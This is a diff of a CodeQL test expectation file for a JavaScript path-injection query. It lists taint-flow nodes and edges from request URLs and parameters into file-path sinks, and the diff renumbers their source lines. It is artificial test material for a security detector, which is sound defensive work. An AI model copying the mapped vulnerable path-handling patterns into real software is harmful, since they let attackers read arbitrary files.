TaintedPath.js:137:28:137:32 | split | semmle.label | split | -| TaintedPath.js:137:28:137:35 | split[x] | semmle.label | split[x] | -| TaintedPath.js:139:7:139:38 | concatted | semmle.label | concatted | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | -| TaintedPath.js:139:33:139:37 | split | semmle.label | split | -| TaintedPath.js:140:19:140:27 | concatted | semmle.label | concatted | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | semmle.label | concatted.join("/") | -| TaintedPath.js:142:7:142:39 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:142:20:142:24 | split | semmle.label | split | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | -| TaintedPath.js:143:19:143:28 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | -| TaintedPath.js:145:19:145:23 | split | semmle.label | split | -| TaintedPath.js:145:19:145:29 | split.pop() | semmle.label | split.pop() | -| TaintedPath.js:150:7:150:48 | path | semmle.label | path | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:150:24:150:30 | req.url | semmle.label | req.url | -| TaintedPath.js:154:29:154:32 | path | semmle.label | path | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:160:29:160:32 | path | semmle.label | path | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:161:29:161:32 | path | semmle.label | path | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:162:29:162:32 | path | semmle.label | path | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:163:29:163:32 | path | semmle.label | path | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | -| TaintedPath.js:178:40:178:43 | path | semmle.label | path | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | -| TaintedPath.js:179:50:179:53 | path | semmle.label | path | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | -| TaintedPath.js:187:38:187:44 | req.url | semmle.label | req.url | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | -| TaintedPath.js:188:51:188:57 | req.url | semmle.label | req.url | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | -| TaintedPath.js:190:44:190:50 | req.url | semmle.label | req.url | -| TaintedPath.js:195:7:195:48 | path | semmle.label | path | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:195:24:195:30 | req.url | semmle.label | req.url | -| TaintedPath.js:196:31:196:34 | path | semmle.label | path | -| TaintedPath.js:197:45:197:48 | path | semmle.label | path | -| TaintedPath.js:198:35:198:38 | path | semmle.label | path | -| TaintedPath.js:202:7:202:48 | path | semmle.label | path | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:202:24:202:30 | req.url | semmle.label | req.url | -| TaintedPath.js:206:29:206:32 | path | semmle.label | path | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:211:7:211:48 | path | semmle.label | path | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:211:24:211:30 | req.url | semmle.label | req.url | -| TaintedPath.js:213:29:213:32 | path | semmle.label | path | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:216:31:216:34 | path | semmle.label | path | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:11:29:11:32 | path | semmle.label | path | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | +| TaintedPath.js:13:45:13:48 | path | semmle.label | path | +| TaintedPath.js:16:33:16:36 | path | semmle.label | path | +| TaintedPath.js:19:33:19:36 | path | semmle.label | path | +| TaintedPath.js:22:33:22:36 | path | semmle.label | path | +| TaintedPath.js:31:31:31:34 | path | semmle.label | path | +| TaintedPath.js:36:3:36:44 | path | semmle.label | path | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:36:20:36:26 | req.url | semmle.label | req.url | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:39:48:39:51 | path | semmle.label | path | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | +| TaintedPath.js:42:45:42:48 | path | semmle.label | path | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:43:51:43:54 | path | semmle.label | path | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:44:50:44:53 | path | semmle.label | path | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | +| TaintedPath.js:45:52:45:55 | path | semmle.label | path | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | +| TaintedPath.js:46:49:46:52 | path | semmle.label | path | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:47:48:47:51 | path | semmle.label | path | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | +| TaintedPath.js:48:54:48:57 | path | semmle.label | path | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | +| TaintedPath.js:49:57:49:60 | path | semmle.label | path | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:54:31:54:76 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:54:63:54:69 | req.url | semmle.label | req.url | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:55:31:55:74 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:55:61:55:67 | req.url | semmle.label | req.url | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | semmle.label | require ... eq.url) | +| TaintedPath.js:56:31:56:73 | require ... ).query | semmle.label | require ... ).query | +| TaintedPath.js:56:60:56:66 | req.url | semmle.label | req.url | +| TaintedPath.js:64:48:64:60 | req.params[0] | semmle.label | req.params[0] | +| TaintedPath.js:73:6:73:47 | path | semmle.label | path | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:73:23:73:29 | req.url | semmle.label | req.url | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | +| TaintedPath.js:75:44:75:47 | path | semmle.label | path | +| TaintedPath.js:76:14:76:17 | path | semmle.label | path | +| TaintedPath.js:77:32:77:39 | realpath | semmle.label | realpath | +| TaintedPath.js:78:45:78:52 | realpath | semmle.label | realpath | +| TaintedPath.js:109:6:109:47 | path | semmle.label | path | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:109:23:109:29 | req.url | semmle.label | req.url | +| TaintedPath.js:111:23:111:26 | path | semmle.label | path | +| TaintedPath.js:115:7:115:48 | path | semmle.label | path | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:115:24:115:30 | req.url | semmle.label | req.url | +| TaintedPath.js:117:19:117:22 | path | semmle.label | path | +| TaintedPath.js:119:7:119:29 | split | semmle.label | split | +| TaintedPath.js:119:15:119:18 | path | semmle.label | path | +| TaintedPath.js:119:15:119:29 | path.split("/") | semmle.label | path.split("/") | +| TaintedPath.js:121:19:121:23 | split | semmle.label | split | +| TaintedPath.js:121:19:121:33 | split.join("/") | semmle.label | split.join("/") | +| TaintedPath.js:125:19:125:23 | split | semmle.label | split | +| TaintedPath.js:125:19:125:26 | split[x] | semmle.label | split[x] | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | semmle.label | prefix + split[x] | +| TaintedPath.js:126:28:126:32 | split | semmle.label | split | +| TaintedPath.js:126:28:126:35 | split[x] | semmle.label | split[x] | +| TaintedPath.js:128:7:128:38 | concatted | semmle.label | concatted | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | +| TaintedPath.js:128:33:128:37 | split | semmle.label | split | +| TaintedPath.js:129:19:129:27 | concatted | semmle.label | concatted | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | semmle.label | concatted.join("/") | +| TaintedPath.js:131:7:131:39 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:131:20:131:24 | split | semmle.label | split | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | +| TaintedPath.js:132:19:132:28 | concatted2 | semmle.label | concatted2 | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | +| TaintedPath.js:134:19:134:23 | split | semmle.label | split | +| TaintedPath.js:134:19:134:29 | split.pop() | semmle.label | split.pop() | +| TaintedPath.js:139:7:139:48 | path | semmle.label | path | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:139:24:139:30 | req.url | semmle.label | req.url | +| TaintedPath.js:143:29:143:32 | path | semmle.label | path | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:149:29:149:32 | path | semmle.label | path | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:150:29:150:32 | path | semmle.label | path | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:151:29:151:32 | path | semmle.label | path | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:152:29:152:32 | path | semmle.label | path | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | +| TaintedPath.js:167:40:167:43 | path | semmle.label | path | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | +| TaintedPath.js:168:50:168:53 | path | semmle.label | path | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | +| TaintedPath.js:176:38:176:44 | req.url | semmle.label | req.url | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | +| TaintedPath.js:177:51:177:57 | req.url | semmle.label | req.url | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | +| TaintedPath.js:179:44:179:50 | req.url | semmle.label | req.url | +| TaintedPath.js:184:7:184:48 | path | semmle.label | path | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:184:24:184:30 | req.url | semmle.label | req.url | +| TaintedPath.js:185:31:185:34 | path | semmle.label | path | +| TaintedPath.js:186:45:186:48 | path | semmle.label | path | +| TaintedPath.js:187:35:187:38 | path | semmle.label | path | +| TaintedPath.js:191:7:191:48 | path | semmle.label | path | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:191:24:191:30 | req.url | semmle.label | req.url | +| TaintedPath.js:195:29:195:32 | path | semmle.label | path | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:200:7:200:48 | path | semmle.label | path | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | semmle.label | url.par ... , true) | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | semmle.label | url.par ... ).query | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | +| TaintedPath.js:200:24:200:30 | req.url | semmle.label | req.url | +| TaintedPath.js:202:29:202:32 | path | semmle.label | path | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | +| TaintedPath.js:205:31:205:34 | path | semmle.label | path | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | | examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | | examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | semmle.label | ROOT + filePath | -| examples/TaintedPath.js:11:36:11:43 | filePath | semmle.label | filePath | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | semmle.label | ROOT + filePath | +| examples/TaintedPath.js:10:36:10:43 | filePath | semmle.label | filePath | | express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | | handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | | handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | @@ -440,22 +440,22 @@ nodes | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | semmle.label | pathPromise [PromiseValue] | | tainted-promise-steps.js:12:20:12:23 | path | semmle.label | path | | tainted-promise-steps.js:12:44:12:47 | path | semmle.label | path | -| tainted-require.js:7:19:7:37 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:12:29:12:47 | req.param("module") | semmle.label | req.param("module") | -| tainted-require.js:14:11:14:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:6:19:6:37 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:11:29:11:47 | req.param("module") | semmle.label | req.param("module") | +| tainted-require.js:13:11:13:29 | req.param("module") | semmle.label | req.param("module") | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | semmle.label | req.param("gimme") | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | semmle.label | req.param("dir") | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | -| tainted-sendFile.js:24:37:24:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:25:34:25:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:33:37:33:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:35:34:35:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | semmle.label | path.re ... rams.x) | +| tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | @@ -504,158 +504,158 @@ nodes | typescript.ts:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | typescript.ts:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | typescript.ts:9:24:9:30 | req.url | semmle.label | req.url | -| typescript.ts:12:29:12:32 | path | semmle.label | path | -| typescript.ts:20:7:20:18 | path3 | semmle.label | path3 | -| typescript.ts:20:15:20:18 | path | semmle.label | path | -| typescript.ts:21:39:21:43 | path3 | semmle.label | path3 | -| typescript.ts:23:7:23:18 | path4 | semmle.label | path4 | -| typescript.ts:23:15:23:18 | path | semmle.label | path | -| typescript.ts:24:39:24:43 | path4 | semmle.label | path4 | -| typescript.ts:30:7:30:18 | path6 | semmle.label | path6 | -| typescript.ts:30:15:30:18 | path | semmle.label | path | -| typescript.ts:32:29:32:33 | path6 | semmle.label | path6 | +| typescript.ts:11:29:11:32 | path | semmle.label | path | +| typescript.ts:19:7:19:18 | path3 | semmle.label | path3 | +| typescript.ts:19:15:19:18 | path | semmle.label | path | +| typescript.ts:20:39:20:43 | path3 | semmle.label | path3 | +| typescript.ts:22:7:22:18 | path4 | semmle.label | path4 | +| typescript.ts:22:15:22:18 | path | semmle.label | path | +| typescript.ts:23:39:23:43 | path4 | semmle.label | path4 | +| typescript.ts:29:7:29:18 | path6 | semmle.label | path6 | +| typescript.ts:29:15:29:18 | path | semmle.label | path | +| typescript.ts:31:29:31:33 | path6 | semmle.label | path6 | | views.js:1:43:1:55 | req.params[0] | semmle.label | req.params[0] | edges -| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:10:41:10:44 | path | provenance | | +| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:9:41:9:44 | path | provenance | | | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | provenance | Config | | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | provenance | Config | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | TaintedPath-es6.js:7:7:7:44 | path | provenance | | | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | provenance | Config | -| TaintedPath-es6.js:10:41:10:44 | path | TaintedPath-es6.js:10:26:10:45 | join("public", path) | provenance | Config | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:12:29:12:32 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:15:45:15:48 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:18:33:18:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:21:33:21:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:24:33:24:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:33:31:33:34 | path | provenance | | +| TaintedPath-es6.js:9:41:9:44 | path | TaintedPath-es6.js:9:26:9:45 | join("public", path) | provenance | Config | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:11:29:11:32 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:13:45:13:48 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:16:33:16:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:19:33:19:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:22:33:22:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:31:31:31:34 | path | provenance | | | TaintedPath.js:9:14:9:37 | url.par ... , true) | TaintedPath.js:9:14:9:43 | url.par ... ).query | provenance | Config | | TaintedPath.js:9:14:9:43 | url.par ... ).query | TaintedPath.js:9:14:9:48 | url.par ... ry.path | provenance | Config | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | TaintedPath.js:9:7:9:48 | path | provenance | | | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:9:14:9:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:15:45:15:48 | path | TaintedPath.js:15:29:15:48 | "/home/user/" + path | provenance | Config | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:42:48:42:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:46:45:46:48 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:48:51:48:54 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:50:50:50:53 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:52:52:52:55 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:54:49:54:52 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:56:48:56:51 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:58:54:58:57 | path | provenance | | -| TaintedPath.js:38:3:38:44 | path | TaintedPath.js:60:57:60:60 | path | provenance | | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | TaintedPath.js:38:10:38:39 | url.par ... ).query | provenance | Config | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | TaintedPath.js:38:10:38:44 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | TaintedPath.js:38:3:38:44 | path | provenance | | -| TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:38:10:38:33 | url.par ... , true) | provenance | Config | -| TaintedPath.js:42:48:42:51 | path | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:46:45:46:48 | path | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | provenance | Config | -| TaintedPath.js:48:51:48:54 | path | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:50:50:50:53 | path | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:52:52:52:55 | path | TaintedPath.js:52:29:52:56 | pathMod ... , path) | provenance | Config | -| TaintedPath.js:54:49:54:52 | path | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | provenance | Config | -| TaintedPath.js:56:48:56:51 | path | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:58:54:58:57 | path | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | provenance | Config | -| TaintedPath.js:60:57:60:60 | path | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | provenance | Config | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | TaintedPath.js:65:31:65:76 | require ... ).query | provenance | Config | -| TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:70 | require ... eq.url) | provenance | Config | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | TaintedPath.js:66:31:66:74 | require ... ).query | provenance | Config | -| TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:68 | require ... eq.url) | provenance | Config | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | TaintedPath.js:67:31:67:73 | require ... ).query | provenance | Config | -| TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:67 | require ... eq.url) | provenance | Config | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:86:44:86:47 | path | provenance | | -| TaintedPath.js:84:6:84:47 | path | TaintedPath.js:87:14:87:17 | path | provenance | | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | TaintedPath.js:84:13:84:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | TaintedPath.js:84:13:84:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | TaintedPath.js:84:6:84:47 | path | provenance | | -| TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:84:13:84:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:86:44:86:47 | path | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | provenance | Config | -| TaintedPath.js:87:14:87:17 | path | TaintedPath.js:88:32:88:39 | realpath | provenance | Config | -| TaintedPath.js:88:32:88:39 | realpath | TaintedPath.js:89:45:89:52 | realpath | provenance | | -| TaintedPath.js:120:6:120:47 | path | TaintedPath.js:122:23:122:26 | path | provenance | | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | TaintedPath.js:120:13:120:42 | url.par ... ).query | provenance | Config | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | TaintedPath.js:120:13:120:47 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | TaintedPath.js:120:6:120:47 | path | provenance | | -| TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:120:13:120:36 | url.par ... , true) | provenance | Config | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:128:19:128:22 | path | provenance | | -| TaintedPath.js:126:7:126:48 | path | TaintedPath.js:130:15:130:18 | path | provenance | | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | TaintedPath.js:126:14:126:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | TaintedPath.js:126:14:126:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | TaintedPath.js:126:7:126:48 | path | provenance | | -| TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:126:14:126:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:130:7:130:29 | split | 